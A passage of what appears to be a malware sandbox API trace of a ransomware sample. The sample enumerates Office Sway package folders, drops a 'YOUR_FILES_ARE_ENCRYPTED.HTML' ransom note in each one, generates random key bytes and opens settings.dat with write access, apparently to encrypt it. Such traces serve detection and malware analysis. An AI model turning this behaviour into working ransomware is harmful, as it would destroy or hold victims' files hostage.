ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0117.064] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.065] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState") returned 97 [0117.065] GetProcessHeap () returned 0x600000 [0117.065] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.065] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState" [0117.065] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState\\*" [0117.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0117.066] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0117.066] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0117.066] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0117.066] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0117.066] GetProcessHeap () returned 0x600000 [0117.066] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.068] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.069] CloseHandle (hObject=0x320) returned 1 [0117.069] GetProcessHeap () returned 0x600000 [0117.069] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.069] GetProcessHeap () returned 0x600000 [0117.069] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.069] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6182197f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61847b4b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x619065e1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0117.069] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.069] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings") returned 93 [0117.069] GetProcessHeap () returned 0x600000 [0117.069] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.069] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings" [0117.069] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\*" [0117.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6182197f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61847b4b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x619065e1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x626978 [0117.069] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6182197f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61847b4b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x619065e1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0117.069] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x618e067f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x618e067f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x618e067f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0117.069] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.069] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 106 [0117.069] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0117.069] lstrlenW (lpString=".lock") returned 5 [0117.070] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0117.070] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61847b4b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61847b4b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0117.070] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.070] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\settings.dat") returned 106 [0117.070] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0117.070] lstrlenW (lpString=".dat") returned 4 [0117.070] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0117.070] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0117.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0117.070] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0117.070] GetProcessHeap () returned 0x600000 [0117.070] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0117.072] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="7E") returned 2 [0117.072] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="42") returned 2 [0117.072] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="35") returned 2 [0117.072] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="70") returned 2 [0117.072] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="F4") returned 2 [0117.072] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E5") returned 2 [0117.072] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="15") returned 2 [0117.072] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="77") returned 2 [0117.072] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="10") returned 2 [0117.072] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="3C") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D7") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="80") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="20") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="62") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="6A") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="FC") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="DD") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="CA") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="1D") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="6E") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="BB") returned 2 [0117.073] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="43") returned 2 [0117.073] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="BA") returned 2 [0117.073] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="DA") returned 2 [0117.073] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="F9") returned 2 [0117.073] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="D8") returned 2 [0117.073] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C6") returned 2 [0117.073] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="29") returned 2 [0117.073] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="AB") returned 2 [0117.073] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="B1") returned 2 [0117.073] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="83") returned 2 [0117.073] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="7B") returned 2 [0117.074] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\settings.dat" [0117.074] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0117.074] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0117.074] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61847b4b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61847b4b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0117.074] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0117.074] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0117.074] GetProcessHeap () returned 0x600000 [0117.074] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.074] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.076] CloseHandle (hObject=0x320) returned 1 [0117.076] GetProcessHeap () returned 0x600000 [0117.076] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.076] GetProcessHeap () returned 0x600000 [0117.076] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.076] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61847b4b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61847b4b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61847b4b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0117.076] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.076] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData") returned 98 [0117.076] GetProcessHeap () returned 0x600000 [0117.076] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.076] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData" [0117.076] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData\\*" [0117.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61847b4b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61847b4b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61847b4b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0117.077] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61847b4b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61847b4b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61847b4b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0117.077] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61847b4b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61847b4b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61847b4b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0117.077] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0117.077] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0117.077] GetProcessHeap () returned 0x600000 [0117.077] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.077] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.078] CloseHandle (hObject=0x320) returned 1 [0117.078] GetProcessHeap () returned 0x600000 [0117.078] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.079] GetProcessHeap () returned 0x600000 [0117.079] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.079] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0117.079] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.079] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState") returned 94 [0117.079] GetProcessHeap () returned 0x600000 [0117.079] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.079] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState" [0117.079] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState\\*" [0117.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0117.079] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0117.079] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0117.079] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0117.079] wnsprintfW (in: pszDest=0x314b010, 